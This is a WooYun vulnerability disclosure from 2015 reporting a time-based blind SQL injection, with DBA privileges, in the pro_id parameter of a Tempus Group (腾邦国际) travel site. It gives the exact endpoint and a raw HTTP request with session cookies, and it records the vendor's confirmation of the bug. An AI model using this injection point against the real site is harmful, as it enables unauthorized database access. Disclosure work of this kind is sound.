当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147242

漏洞标题:腾邦国际主站SQL注入漏洞(时间盲注/DBA权限)

相关厂商:腾邦集团

漏洞作者: 无路赛

提交时间:2015-10-17 09:03

修复时间:2015-12-03 09:06

公开时间:2015-12-03 09:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-17: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

RT

详细说明:

1.腾邦国际主站

主站.png


GET /insurance/Card_detail.php?pro_id=192* HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://bj.feiren.com/
Cookie: PHPSESSID=e8298rvqdrlmb5i7doic7h1n43; 
flight_search_param=YToxMDp7czo0OiJ0eXBlIjtpOjE7czo0OiJmcm9tIjtOO3M6MTQ6ImZyb21fY2l0eV9uYW1lIjtOO3M6MjoidG8iO047czoxMjoidG9fY2l0eV9uYW1lIjtOO3M6NToic3RhcnQiO3M6MTA6IjIwMTUtMDk
tMjQiO3M6NzoiYWlyd2F5cyI7czowOiIiO3M6NToiY2FiaW4iO3M6MDoiIjtzOjU6ImNvdW50IjtzOjE6IjMiO3M6Nzoib3JkZXJieSI7czowOiIiO30%3D; flight_order_info=czowOiIiOw%3D%3D; 
flight_firstFlight=czowOiIiOw%3D%3D; flight_airway_q_cokiee=czowOiIiOw%3D%3D; flight_flight_first_date=czoxMDoiMjAxNS0wOS0yNCI7; userfrom=http%3A%2F%2Fbj.feiren.com; 
userRequest=a%253A18%253A%257Bs%253A3%253A%2522act%2522%253Bs%253A6%253A%2522search%2522%253Bs%253A2%253A%2522id%2522%253Bs%253A5%253A%252213525%2522%253Bs%253A1%253A%2522L
%2522%253Bs%253A3%253A%2522300%2522%253Bs%253A1%253A%2522H%2522%253Bs%253A3%253A%2522400%2522%253Bs%253A7%253A%2522mapCity%2522%253Bs%253A4%253A%2522%25CE
%25F7%25B0%25B2%2522%253Bs%253A4%253A%2522city%2522%253Bs%253A6%253A%2522images%2522%253Bs%253A7%253A%2522brandid%2522%253Bs%253A3%253A%2522912%2522%253Bs%253A5%253A
%2522brand%2522%253Bs%253A0%253A%2522%2522%253Bs%253A10%253A%2522commercial%2522%253Bs%253A0%253A%2522%2522%253Bs%253A8%253A%2522district%2522%253Bs%253A0%253A
%2522%2522%253Bs%253A2%253A%2522in%2522%253Bs%253A17%253A%25222015-09-01%2B%25D0%25C7%25C6%25DA%25B6%25FE%2522%253Bs%253A3%253A%2522out%2522%253Bs%253A17%253A%25222015-11-
04%2B%25D0%25C7%25C6%25DA%25C8%25FD%2522%253Bs%253A5%253A%2522round%2522%253Bs%253A0%253A%2522%2522%253Bs%253A4%253A%2522star%2522%253Bs%253A0%253A%2522%2522%253Bs%253A7%253A
%2522keyword%2522%253Bs%253A0%253A%2522%2522%253Bs%253A5%253A%2522price%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522submit%2522%253Bs%253A0%253A%2522%2522%253Bs
%253A4%253A%2522type%2522%253Bs%253A1%253A%25222%2522%253B%257D; my_foot_histry=a%3A11%3A%7Bi%3A23781%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2223781%22%3Bs%3A4%3A%22name
%22%3Bs%3A16%3A%22%B9%E3%D6%DD%BF%C6%B6%FB%BA%A3%D4%C3%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_23781%2FThumbnailImg
%2F2011070814453177869.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A628%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x5%22+title%3D%22%CE%E5%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C
%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894700%3B%7Di%3A60440%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2260440%22%3Bs%3A4%3A%22name%22%3Bs%3A26%3A%22%D6%D8%C7%EC%D3%CE
%C0%D6%C3%C0%B9%AB%D4%A2%28%C4%CF%C6%BA%D0%AD%D0%C5%B5%EA%29%22%3Bs%3A3%3A%22img%22%3Bs%3A74%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_60440%2FThumbnailImg
%2F20130527172532595450.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A208%3Bs%3A4%3A%22star%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894702%3B%7Di%3A22444%3Ba%3A6%3A%7Bs
%3A2%3A%22id%22%3Bs%3A5%3A%2222444%22%3Bs%3A4%3A%22name%22%3Bs%3A12%3A%22%CE%E4%BA%BA%BB%DD%D4%B7%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F
%2Fimage.tempus.cn%2FHotel%2FH_22444%2FThumbnailImg%2F2011070809321456624.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A170%3Bs%3A4%3A%22star%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22time
%22%3Bi%3A1442894707%3B%7Di%3A26667%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2226667%22%3Bs%3A4%3A%22name%22%3Bs%3A16%3A%22%B3%C9%B6%BC%C8%F0%B3%C7%C3%FB%C8%CB%BE%C6%B5%EA
%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_26667%2FThumbnailImg%2F2011070816084889073.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A519%3Bs%3A4%3A
%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x4%22+title%3D%22%CB%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894708%3B%7Di%3A60420%3Ba
%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2260420%22%3Bs%3A4%3A%22name%22%3Bs%3A14%3A%22%CC%EC%BD%F2%BA%A3%CE%F7%B4%F3%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A74%3A%22http%3A%2F
%2Fimage.tempus.cn%2FHotel%2FH_60420%2FThumbnailImg%2F20130527151125395220.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A278%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D
%22x4%22+title%3D%22%CB%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894712%3B%7Di%3A28417%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A
%2228417%22%3Bs%3A4%3A%22name%22%3Bs%3A18%3A%22%C9%C2%CE%F7%BA%A3%BE%B0%BE%C6%B5%EA%28%CE%F7%B0%B2%29%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn
%2FHotel%2FH_28417%2FThumbnailImg%2F2011070816412183717.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A398%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x4%22+title%3D%22%CB
%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894803%3B%7Di%3A59339%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2259339%22%3Bs%3A4%3A%22name
%22%3Bs%3A12%3A%22%B3%C9%B6%BC%C0%F1%B6%D9%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A74%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_59339%2FThumbnailImg
%2F20140428173125102140.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A241%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x4%22+title%3D%22%CB%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C
%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894716%3B%7Di%3A26764%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2226764%22%3Bs%3A4%3A%22name%22%3Bs%3A16%3A%22%B3%C9%B6%BC%BC
%D2%D4%B0%B9%FA%BC%CA%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_26764%2FThumbnailImg%2F2014062609474112922.jpg%22%3Bs%3A6%3A
%22lprice%22%3Bd%3A488%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x5%22+title%3D%22%CE%E5%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi
%3A1442894720%3B%7Di%3A19810%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2219810%22%3Bs%3A4%3A%22name%22%3Bs%3A20%3A%22%CF%C3%C3%C5%B9%C4%C0%CB%D3%EC%B0%AE%C0%F6%CB%BF%D0%A1%CE
%DD%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_19810%2FThumbnailImg%2F2011070808510708591.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A228%3Bs
%3A4%3A%22star%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894738%3B%7Di%3A12633%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2212633%22%3Bs%3A4%3A%22name%22%3Bs%3A14%3A
%22%C9%CF%BA%A3%CD%A8%C3%AF%B4%F3%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_12633%2FThumbnailImg%2F2011070811395314371.jpg
%22%3Bs%3A6%3A%22lprice%22%3Bd%3A608%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x4%22+title%3D%22%CB%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A
%22time%22%3Bi%3A1442894754%3B%7Di%3A23480%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2223480%22%3Bs%3A4%3A%22name%22%3Bs%3A29%3A%22%B9%E3%D6%DD%B3%BF%C1%FA168%CA%B1%C9%D0%BE
%C6%B5%EA%28%C0%F3%CD%E5%C2%B7%B5%EA%29%22%3Bs%3A3%3A%22img%22%3Bs%3A74%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_23480%2FThumbnailImg%2F20140613105603947660.jpg%22%3Bs
%3A6%3A%22lprice%22%3Bd%3A148%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x2%22+title%3D%22%B6%FE%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time
%22%3Bi%3A1442894792%3B%7D%7D
Host: bj.feiren.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


pro_id存在注入

注入点.png

漏洞证明:

DBA权限

dba.png


7个数据库

dbs.jpg


22个表

表.png


时间盲注跑数据太慢,不深入了

修复方案:

过滤参数

版权声明:转载请注明来源 无路赛@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-19 09:05

厂商回复:

已通知项目组尽快修复漏洞,非常感谢!

最新状态:

暂无